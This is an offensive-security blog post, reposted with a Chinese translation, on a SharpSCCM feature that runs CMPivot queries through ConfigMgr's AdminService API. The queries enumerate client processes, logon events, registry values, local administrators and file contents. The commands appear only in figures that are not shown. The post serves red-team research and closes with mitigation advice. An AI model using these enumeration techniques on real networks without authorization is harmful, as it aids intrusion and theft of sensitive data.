Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)

Introduction 介绍

Earlier this year, I submitted a pull request to SharpSCCM’s repository. SharpSCCM is a tool that Chris Thompson developed with the purpose of demonstrating possible attacks against Microsoft Configuration Manager (ConfigMgr, formerly Microsoft Systems Center Configuration Manager [SCCM]) deployments.
今年早些时候,我向 SharpSCCM 的存储库提交了拉取请求。SharpSCCM 是 Chris Thompson 开发的一种工具,旨在演示针对 Microsoft Configuration Manager(ConfigMgr,以前称为 Microsoft Systems Center Configuration Manager [SCCM])部署的可能攻击。

The submitted PR was meant to extend SharpSCCM’s functionality by implementing the option of executing CMPivot queries through the Administration Service (AdminService) REST API. When operating within an SCCM/ConfigMgr site, and under the right context, this added capability can provide offensive operators with the ability to enumerate almost every aspect of a client’s software and hardware (starting with Configuration Manager 1810).
提交的 PR 旨在通过管理服务 (AdminService) REST API 实现执行 CMPivot 查询的选项来扩展 SharpSCCM 的功能。在 SCCM/ConfigMgr 站点内操作时,在正确的上下文中,此添加的功能可以为攻击性操作员提供枚举客户端软件和硬件的几乎每个方面的能力(从 Configuration Manager 1810 开始)。

TL;DR — You Can Now Leverage CMPivot with SharpSCCM
TL;DR — 您现在可以将 CMPivot 与 SharpSCCM 结合使用

SharpSCCM now lets you execute CMPivot queries against clients of a ConfigMgr site. You can see some practical use examples here.
SharpSCCM 现在允许您对 ConfigMgr 站点的客户端执行 CMPivot 查询。你可以在这里看到一些实际使用的例子。

Credits 学分

I did not entirely come up with this idea myself. Instead, I was lucky enough to be part of a conversation where the potential of leveraging ConfigMgr’s CMPivot queries and AdminService for offensive tradecraft was discussed. Chris Thompson (@_Mayyhem), Duane Michael (@subat0mik), Andy Robbins (@_wald0), Stephen Hinck (@StephenHinck), all of whom are much more experienced and well-versed than me in the subject at hand and offensive security overall, really brought to light the potential of leveraging these services as an offensive operator. Beyond that, Chris and Duane really pushed and helped me towards the goal of making this happen. Thanks for all the support!
我自己并没有完全想出这个想法。相反,我有幸参加了一次对话,讨论了利用 ConfigMgr 的 CMPivot 查询和 AdminService 进行攻击易的潜力。克里斯·汤普森(@_Mayyhem)、杜安·迈克尔(@subat0mik)、安迪·罗宾斯(@_wald0)、斯蒂芬·欣克(@StephenHinck),他们都比我更有经验,更精通手头的主题和整体进攻安全,真正揭示了利用这些服务作为进攻运营商的潜力。除此之外,Chris和Duane真的推动并帮助我实现了实现这一目标的目标。感谢大家的支持!

Objective 目的

The objective of this blogpost is to show the ways we can leverage the AdminService API as a malicious actor and execute CMPivot queries on ConfigMgr clients, which can now be done with SharpSCCM. The post also aims at providing a brief look at the background and inner workings of this new functionality and with that, hopefully maximizing its effectiveness and safety during use.
这篇博文的目的是展示如何利用 AdminService API 作为恶意参与者,并在 ConfigMgr 客户端上执行 CMPivot 查询,现在可以使用 SharpSCCM 完成。这篇文章还旨在简要介绍这项新功能的背景和内部工作原理,并希望在使用过程中最大限度地提高其有效性和安全性。

Impact 冲击

When operating with the required permissions, a user can leverage the AdminService to deploy operations to any client devices within the ConfigMgr site. These operations can allow for enumeration of:
使用所需权限进行操作时,用户可以利用 AdminService 将操作部署到 ConfigMgr 站点内的任何客户端设备。这些操作可以允许枚举:

· active sessions ·活动会话

· registry keys and values

· local administrators ·本地管理员

· arbitrary file contents

And so much more! 还有更多!

There are more than 130 entities (querying objects) available with CMPivot. These entities can be combined and filtered to create more targeted queries as well.
CMPivot 提供了 130 多个实体(查询对象)。这些实体也可以进行组合和筛选,以创建更有针对性的查询。

You can follow the link on the operations listed above to see practical use case examples for each.

Permissions 权限

The following permissions are needed for CMPivot:
CMPivot 需要以下权限:

· Run CMPivot permission on the Collection scope
·对集合范围运行 CMPivot 权限

· Read permission on Collections

· Read permission on the SMS Scripts object (n/a after version 2107)
·对 SMS 脚本对象的读取权限(版本 2107 之后不适用)

· The default scope (n/a after version 2107)
·默认范围(版本 2107 之后的不适用)

Background 背景

A lot of this terminology may sound unfamiliar if you have not looked into the subject before. This first section is a very general and quick introduction to the main concepts we’ll be discussing in this article.

If you are completely new to Microsoft Configuration Manager (ConfigMgr), there are a multitude of resources from where you can learn online, and although not the main purpose of the article, a good gateway to the subject for me was Chris Thompson’s post “Coercing NTLM Authentication From SCCM”. It has a quick summary of most things you should know in order to start with it from an offensive security perspective.
如果您完全不熟悉 Microsoft 配置管理器 (ConfigMgr),则可以从中在线学习大量资源,尽管不是本文的主要目的,但对我来说,Chris Thompson 的帖子“从 SCCM 强制 NTLM 身份验证”是一个很好的门户。它快速总结了您应该了解的大多数事情,以便从进攻性安全角度开始。

CMPivot CMPivot的

CMPivot has been a part of the ConfigMgr framework since version 1806. It is presented as an in-console || standalone solution that allows for real-time collection of data from hosts that are clients within a ConfigMgr/SCCM site. The collection of this data is made based on several different entities or queries. These queries allow the user to pull data like Windows event logs, registry values, file contents, operating system (OS) information, hardware information, local group information, and more from any ConfigMgr client host.
自版本 1806 以来,CMPivot 一直是 ConfigMgr 框架的一部分。它以控制台内的形式呈现 ||独立解决方案,允许从 ConfigMgr/SCCM 站点中的客户端主机实时收集数据。此数据的收集基于多个不同的实体或查询进行。这些查询允许用户从任何 ConfigMgr 客户端主机中提取 Windows 事件日志、注册表值、文件内容、操作系统 (OS) 信息、硬件信息、本地组信息等数据。

Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)
Figure 1 — CMPivot Console
图 1 — CMPivot 控制台

Something very useful is also the option to apply different filters to such queries to make them more efficient and better target our desired data. For example, we can filter a query that enumerates the OS of a target in a way that will only show the ones running a 64-bit OS architecture. We can also point these queries against a certain scope. For example, we can run it against a specific resource or target an entire collection of hosts instead.
非常有用的一点是,还可以选择对此类查询应用不同的过滤器,以使它们更有效率并更好地定位我们所需的数据。例如,我们可以筛选枚举目标操作系统的查询,该查询仅显示运行 64 位操作系统体系结构的操作系统。我们还可以将这些查询指向某个范围。例如,我们可以针对特定资源运行它,也可以改为以整个主机集合为目标。

Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)
Figure 2 — Basic CMPivot Query
图 2 — 基本 CMPivot 查询

On the left-hand side of the CMPivot console, we can see just a small portion of the many different entities and queries within them that we can execute to obtain information from clients. These CMPivot queries use a subset of the KUSTO Query Language (KQL).
在 CMPivot 控制台的左侧,我们只能看到许多不同实体和查询中的一小部分,我们可以执行这些实体和查询以从客户端获取信息。这些 CMPivot 查询使用 KUSTO 查询语言 (KQL) 的子集。

Administrator Service REST API
管理员服务 REST API

Way back with the release of a technical preview of Configuration Manager 1612, Microsoft introduced something called the CMRestProvider. This was a newly implemented open data endpoint that allowed accessing data that was available in the Configuration Manager WMI Provider (Systems Management Service Provider) via a REST API.
早在发布Configuration Manager 1612技术预览版时,Microsoft引入了CMRestProvider。这是一个新实现的开放数据终结点,允许通过 REST API 访问 Configuration Manager WMI 提供程序(系统管理服务提供程序)中可用的数据。

As in Microsoft’s fashion, the names changed at least once from then and gave way to what is now known as the AdminService REST API. As part of its regular functioning, ConfigMgr uses this API in the background to perform different queries. For example, ConfigMgr can be configured so an administrator can approve or deny application installation requests from clients by clicking a link in an email, eliminating the need to do this from the ConfigMgr console.
就像Microsoft的风格一样,从那时起,名称至少更改了一次,并让位于现在称为AdminService REST API的内容。作为其常规功能的一部分,ConfigMgr 在后台使用此 API 来执行不同的查询。例如,可以配置 ConfigMgr,以便管理员可以通过单击电子邮件中的链接来批准或拒绝来自客户端的应用程序安装请求,而无需从 ConfigMgr 控制台执行此操作。

This REST API is available to any domain account that holds the right permissions; this means a user with the required privileges can make queries by sending GET and POST requests to this endpoint. These requests can be made via a web browser, PowerShell, or whatever tool that allows for sending these types of requests.
此 REST API 可供任何拥有正确权限的域帐户使用;这意味着具有所需权限的用户可以通过向此端点发送 GET 和 POST 请求来进行查询。这些请求可以通过 Web 浏览器、PowerShell 或任何允许发送这些类型请求的工具发出。

Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)
Figure 3 — AdminService Request
图 3 — AdminService 请求

Several methods are available with the AdminService, but the ones we care about from the perspective of this blogpost are the ones that let us execute CMPivot queries. For this, we can use the AdminService.RunCMPivot method.
AdminService 提供了几种方法,但从这篇博文的角度来看,我们关心的是那些允许我们执行 CMPivot 查询的方法。为此,我们可以使用 AdminService.RunCMPivot 方法。

When sending our requests, the query must be sent as JSON within the body of the request, and we have the option of pointing it against a collection of resources (hosts, users) or against a single target. This is a little excerpt on how SharpSCCM makes these requests.
发送请求时,查询必须在请求正文中以 JSON 形式发送,我们可以选择将其指向资源集合(主机、用户)或单个目标。这是关于 SharpSCCM 如何发出这些请求的摘录。

Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)
Figure 4 — SharpSCCM AdminService Requests
图4 — SharpSCCM AdminService请求

Basic Usage 基本用法

Enter Invoke admin-service Command
输入 Invoke admin-service 命令

Now that we have covered a bit of the basics, we can dig a little deeper into the implementation of this capability with SharpSCCM. The new feature now adds the admin-service option to SharpSCCM’s invoke command and with this the possibility to execute any CMPivot queries that we specify with the “-q” flag. A basic example of a query that enumerates the processes running within a particular host/target:
现在我们已经介绍了一些基础知识,我们可以更深入地了解使用 SharpSCCM 实现此功能。新功能现在将 admin-service 选项添加到 SharpSCCM 的 invoke 命令中,从而可以执行我们用“-q”标志指定的任何 CMPivot 查询。枚举在特定主机/目标中运行的进程的查询的基本示例:

Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)
Figure 5 — SharpSCCM Process Enumeration Query
图 5 — SharpSCCM 进程枚举查询

Note: In the example, the target is identified by its resource-id. I will show how SharpSCCM can get us that information in a later section.
注意:在示例中,目标由其 resource-id 标识。我将在后面的部分中展示 SharpSCCM 如何为我们提供这些信息。

Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)
Figure 6 — SharpSCCM Process Enumeration Results
图 6 — SharpSCCM 进程枚举结果

Depending on the data we are trying to gather, we can also have the option of applying some filters to our data to make the queries more efficient. In this case, we can do so by listing any process with the name msedge.exe
根据我们尝试收集的数据,我们还可以选择对数据应用一些过滤器,以提高查询效率。在这种情况下,我们可以通过列出名为 msedge.exe 的任何进程来做到这一点

Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)
Figure 7 — Query Filters
图 7 — 查询筛选器

Results Collection Process

Before looking into some other options available with the admin-service command, let’s take a look at how the results of these queries are returned to us in the background.
在研究 admin-service 命令提供的其他一些选项之前,让我们先看看这些查询的结果是如何在后台返回给我们的。

After receiving an OperationId from a successful call to the AdminService.RunCMPivot method, we can use that information to call the AdminService.CMPivotResult method and obtain the results from our initial query. Figure 8 illustrates this and shows our enumeration of all processes running on a target the same way we did with SharpSCCM in the previous sections.
从成功调用 AdminService.RunCMPivot 方法收到 OperationId 后,可以使用该信息调用 AdminService.CMPivotResult 方法,并从初始查询中获取结果。图 8 对此进行了说明,并显示了我们对目标上运行的所有进程的枚举,其方式与前面几节中对 SharpSCCM 所做的相同。

Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)
Figure 8 — AdminService Results Method Call
图 8 — AdminService 结果方法调用

Something of note here is that two different method calls are made to complete the query.

Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)
Figure 9 — CMPivot Query Process
图 9 — CMPivot 查询过程

If we were performing these actions from the CMPivot user interface, we would see the results of the query displayed in the console; however, since we are making our requests through the Admin Service, we must make a separate request for the results.
如果我们从 CMPivot 用户界面执行这些操作,我们将看到控制台中显示的查询结果;但是,由于我们是通过管理服务提出请求的,因此我们必须对结果提出单独的请求。

When doing this programmatically, keep in mind that there will need to be a delay between the initial query and the collection of results. This is to allow enough time for the PowerShell script that CMPivot uses to gather the queried data to complete its operations on the target.
以编程方式执行此操作时,请记住,初始查询和结果收集之间需要有延迟。这是为了让 CMPivot 用于收集查询数据的 PowerShell 脚本有足够的时间,以完成其对目标的操作。

Luckily, these delays are not too significant since data is sent from CMPivot to the client via SCCM’s fast channel and after the script completes on the client, the results are sent back via the quick state message system. However, we still need to take the wait into account.
幸运的是,这些延迟并不太明显,因为数据通过 SCCM 的快速通道从 CMPivot 发送到客户端,脚本在客户端上完成后,结果通过快速状态消息系统发送回。但是,我们仍然需要考虑等待。

Delay and Max Retries 延迟和最大重试次数

To tackle this, SharpSCCM will periodically check for results after an operation has been triggered; the default is every five seconds for a maximum amount of five times. A user can also tweak these values with the “delay” and “max tries” flags respectively. For example, if we want the tool to check every 10 seconds for a maximum of three times, we could do the following:
为了解决这个问题,SharpSCCM 将在触发操作后定期检查结果;默认值为每 5 秒一次,最多 5 次。用户还可以分别使用“delay”和“max tries”标志调整这些值。例如,如果我们希望该工具每 10 秒检查一次,最多检查三次,我们可以执行以下操作:

Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)
Figure 10 — Delay and Retries
图10 — 延迟和重试

Single Resource vs Collection

We can also take advantage of CMPivot’s ability to query either a single resource or a group of resources, known as a collection in SCCM lingo. If we are pointing our queries against a single target, we are going to need the resource-id associated with that host within the ConfigMgr/SCCM site. We can obtain this with SharpSCCM by using the resource-id option from the “get” command. We use the “-d” flag to indicate the hostname that we are trying to resolve. For example:
我们还可以利用 CMPivot 查询单个资源或一组资源(在 SCCM 术语中称为集合)的功能。如果我们将查询指向单个目标,我们将需要与 ConfigMgr/SCCM 站点中的该主机关联的 resource-id。我们可以使用“get”命令中的 resource-id 选项使用 SharpSCCM 获得此信息。我们使用“-d”标志来指示我们尝试解析的主机名。例如:

Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)
Figure 11 — Resource-id Resolution
图 11 — 资源 ID 解析

And if we want to point the query to a collection, we just need to know the name of it or choose a default collection (if available).

Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)
Figure 12 — All Systems Query
图 12 — 所有系统查询

JSON Output JSON 输出

We can also have the data returned to us as JSON by using the “-j” flag to our commands.
我们还可以通过在命令中使用“-j”标志将数据作为 JSON 返回给我们。

Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)
Figure 13 — JSON Output Query
图 13 — JSON 输出查询

Practical Use Cases 实际用例

The following shows some practical examples with SharpSCCM.
下面显示了 SharpSCCM 的一些实际示例。

Active Sessions 活动会话

We can attempt to enumerate active sessions on a client by leveraging CMPivot to collect records from the Windows Event Log of a target. Events with security Event ID 4624 — An account was successfully logged on — can give us a good idea of the current or recent sessions running on target. A query to get started would look like this:
我们可以尝试通过利用 CMPivot 从目标的 Windows 事件日志中收集记录来枚举客户端上的活动会话。具有安全事件 ID 4624 的事件 — 帐户已成功登录 — 可以让我们很好地了解在目标上运行的当前或最近的会话。开始的查询如下所示:

Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)
Figure 14 — Event ID 4624 Filtered Query
图 14 — 事件 ID 4624 筛选的查询

Registry Keys and Values 注册表项和值

Let’s say we want to enumerate a particular registry. For example, if we would like to check all the systems in the site that have PowerShell version 2 available, we would target the default “All Systems” (SMS00001) collection in the following query:
假设我们要枚举一个特定的注册表。例如,如果我们想要检查站点中具有 PowerShell 版本 2 的所有系统,我们将在以下查询中定位默认的“所有系统”(SMS00001)集合:

Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)
Figure 15 — PowerShell Version Enumeration
图 15 — PowerShell 版本枚举

Local Administrators 本地管理员

We can query for the local administrators of a certain target too:

Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)
Figure 16 — Local Administrators Enumeration
图 16 — 本地管理员枚举

Or we can query for a specific admin account on all clients:

Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)
Figure 17 — Targeted Local Administrator Enumeration
图 17 — 目标本地管理员枚举

Arbitrary File Contents 任意文件内容

We can also read the contents of a sensitive file within a target. For example:

Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)
Figure 18 — File Content Read
图18 — 文件内容读取

Or we can look for a particular file within all clients on the site. Note that it is important to factor in the size and bandwidth of the site before executing a broadly scoped query like this.

Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)
Figure 19 — File Search
图19 — 文件搜索

Conclusion 结论

My hope is that this added functionality will help bring some attention to the vast power that comes from having full administrator or equivalent permissions within a ConfigMgr/SCCM site and how leveraging CMPivot can allow for very detailed data gathering and enumeration of client hosts.
我希望这个新增的功能将有助于引起人们对在 ConfigMgr/SCCM 站点中拥有完全管理员或同等权限所带来的巨大功能的关注,以及利用 CMPivot 如何允许非常详细的数据收集和客户端主机枚举。

Mitigation 缓解

Starting in Configuration Manager 1702, you have the option of enabling multi-factor authentication (MFA) authentication for SMS provider calls. This can help prevent any unauthorized administrative access request to it.
从 Configuration Manager 1702 开始,你可以选择为 SMS 提供程序调用启用多重身份验证 (MFA) 身份验证。这有助于防止对其发出任何未经授权的管理访问请求。

For some information on how to enable this, see

SharpSCCM’s wiki also includes a list of defensive recommendations for ConfigMgr/SCCM:
SharpSCCM 的 wiki 还包括针对 ConfigMgr/SCCM 的防御性建议列表:


原文始发于Diego lomellini:Lateral Movement without Lateral Movement (Brought to you by ConfigMgr)

版权声明:admin 发表于 2023年11月8日 上午10:43。
转载请注明:Lateral Movement without Lateral Movement (Brought to you by ConfigMgr) | CTF导航